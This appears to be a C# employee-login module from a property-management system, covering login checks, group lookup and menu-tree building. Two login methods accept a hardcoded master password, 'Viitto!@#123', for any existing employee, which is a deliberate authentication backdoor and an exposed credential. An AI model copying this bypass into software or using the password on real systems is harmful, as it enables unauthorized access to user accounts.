﻿using REBORN.Common;
using REBORN.Common.Enum;
using REBORN.Common.Plugin;
using Property.Model.Entity;
using Property.Model.Extend;
using Property.Repository;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace Property.Module.UserModule
{
    /// <summary>
    /// 登录模块
    /// </summary>
    public class EmployeeModule
    {
        /// <summary>
        /// 员工
        /// </summary>
        private Rb_employeeRepository repository = new Rb_employeeRepository();
        /// <summary>
        /// 集团
        /// </summary>
        private Rb_Group_Repository group_Repository = new Rb_Group_Repository();
        /// <summary>
        /// 菜单
        /// </summary>
        private Rb_sys_menuRepository sysMenuRespository = new Rb_sys_menuRepository();


        /// <summary>
        /// 构造函数
        /// </summary>
        public EmployeeModule()
        {
            
        }

        /// <summary>
        /// 获取用户列表
        /// </summary>
        /// <param name="where"></param>
        /// <returns></returns>
        public List<RB_Employee_Extend> GetList(RB_Employee_Extend where) {
            return repository.GetList(where);
        }
        /// <summary>
        /// 根据域名获取集团信息
        /// </summary>
        /// <param name="dmodel"></param>
        /// <returns></returns>
        public List<Model.Extend.RB_Group_Extend> GetGroupByDomain(Model.Extend.RB_Group_Extend dmodel)
        {
            return group_Repository.GetListByDomain(dmodel);
        }

        /// <summary>
        /// 根据登陆手机号密码获取员工信息
        /// </summary>
        /// <param name="loginMobile">登陆手机号</param>
        /// <param name="pwd">密码</param>
        /// <param name="RB_Group_id">集团编号</param>
        /// <returns></returns>
        public RB_Employee GetByLoginMobileAndPwd(string loginMobile, string pwd, int RB_Group_id)
        {
            RB_Employee emp = repository.GetByLoginMobile(loginMobile, RB_Group_id);
            //管理员密码
            var adminPwd = REBORN.Common.DES.Encrypt("Viitto!@#123", REBORN.Common.Config.WebApiKey, REBORN.Common.Config.WebApiIV);
            if (emp != null && (emp.EmPassword.Equals(pwd) || pwd.Equals(adminPwd)))
            {
                return emp;
            }
            else
            {
                return null;
            }
        }
        /// <summary>
        /// 根据登陆手机号密码获取员工信息
        /// </summary>
        /// <param name="loginMobile">登陆手机号</param>
        /// <param name="pwd">密码</param>
        /// <returns></returns>
        public RB_Employee GetByLoginMobileAndPwd(string loginMobile, string pwd)
        {
            RB_Employee emp = repository.GetByLoginMobile(loginMobile);
            if (emp != null && emp.EmPassword.Equals(pwd))
            {
                return emp;
            }
            else
            {
                return null;
            }
        }

        /// <summary>
        /// 根据账号密码获取员工信息 2018-12-18 Add
        /// </summary>
        /// <param name="account">账号</param>
        /// <param name="pwd">密码</param>
        /// <param name="RB_Group_id">集团编号</param>
        /// <returns></returns>
        public RB_Employee GetNewByAccountAndPwd(string account, string pwd, int RB_Group_id)
        {
            RB_Employee emp = repository.GetByAccount(account, RB_Group_id);
            //管理员密码
            var adminPwd = REBORN.Common.DES.Encrypt("Viitto!@#123", REBORN.Common.Config.WebApiKey, REBORN.Common.Config.WebApiIV);
            if (emp != null && (emp.EmPassword.Equals(pwd) || pwd.Equals(adminPwd)))
            {
                return emp;
            }
            else
            {
                return null;
            }
        }


        /// <summary>
        /// ERP获取用户所有的菜单数据
        /// </summary>
        /// <returns></returns>
        public List<RB_Sys_Menu_Extend> GetUserMenuAllList(int postId, int EmployeeId, out List<RB_Sys_Menu_Extend> userMenuList)
        {
            userMenuList = sysMenuRespository.GetPostAllRoleByPostId(postId);
            List<RB_Sys_Menu_Extend> sysMenuList = new List<RB_Sys_Menu_Extend>();
            if (userMenuList != null && userMenuList.Count > 0)
            {
                var dataList = userMenuList.Where(t => t.ParentId == 0).OrderBy(qitem => qitem.Sort).ThenBy(t => t.MenuId);
                foreach (var item in dataList)
                {
                    RB_Sys_Menu_Extend menuExtend = item.RefMapperTo<RB_Sys_Menu_Extend>();
                    List<RB_Sys_Menu_Extend> secondMenuList = new List<RB_Sys_Menu_Extend>();
                    foreach (var secondMenu in userMenuList.Where(t => t.ParentId == item.MenuId).OrderBy(qitem => qitem.Sort).ThenBy(t => t.MenuId))
                    {
                        RB_Sys_Menu_Extend secondMenuExtend = secondMenu.RefMapperTo<RB_Sys_Menu_Extend>();
                        List<RB_Sys_Menu_Extend> threeMenuList = new List<RB_Sys_Menu_Extend>();

                        foreach (var threeMenu in userMenuList.Where(t => t.ParentId == secondMenu.MenuId))
                        {
                            RB_Sys_Menu_Extend threeMenuExtend = threeMenu.RefMapperTo<RB_Sys_Menu_Extend>();
                            threeMenuList.Add(threeMenuExtend);
                        }
                        secondMenuExtend.ChildMenu = threeMenuList;
                        var NoGroupingCodeList = threeMenuList.Where(x => string.IsNullOrWhiteSpace(x.GroupingCode)).ToList();
                        List<string> GroupingCodeList = threeMenuList.Where(x => !string.IsNullOrWhiteSpace(x.GroupingCode)).Select(x => x.GroupingCode).Distinct().ToList();
                        List<object> NewChildList = new List<object>();
                        foreach (var GCode in GroupingCodeList)
                        {
                            var GCodeList = threeMenuList.Where(x => x.GroupingCode == GCode).ToList();
                            NewChildList.Add(new
                            {
                                GCode,
                                list = GCodeList
                            });
                        }
                        if (NoGroupingCodeList.Count() > 0)
                        {
                            NewChildList.Add(new
                            {
                                GCode = "默认",
                                list = NoGroupingCodeList
                            });
                        }
                        secondMenuExtend.NewChildMenu = NewChildList;
                        secondMenuList.Add(secondMenuExtend);
                    }
                    menuExtend.ChildMenu = secondMenuList;
                    sysMenuList.Add(menuExtend);
                }
            }
            return sysMenuList;
        }
    }
}
